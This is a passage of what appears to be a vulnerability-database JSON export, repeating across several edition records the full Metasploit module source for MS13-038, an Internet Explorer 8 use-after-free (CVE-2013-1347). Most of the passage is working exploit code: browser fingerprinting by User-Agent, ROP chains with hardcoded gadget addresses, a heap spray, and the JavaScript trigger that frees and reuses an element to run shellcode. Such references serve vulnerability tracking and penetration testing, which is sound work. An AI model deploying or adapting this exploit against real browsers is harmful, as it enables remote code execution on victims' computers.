'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-10T03:31:40", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-10T07:14:48", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-10T07:14:48", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-12T17:38:18", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-12T17:38:18", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-12T19:27:55", "history": [], "viewCount": 92, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-12T19:27:55", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-09-02T09:46:29", "history": [], "viewCount": 92, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' 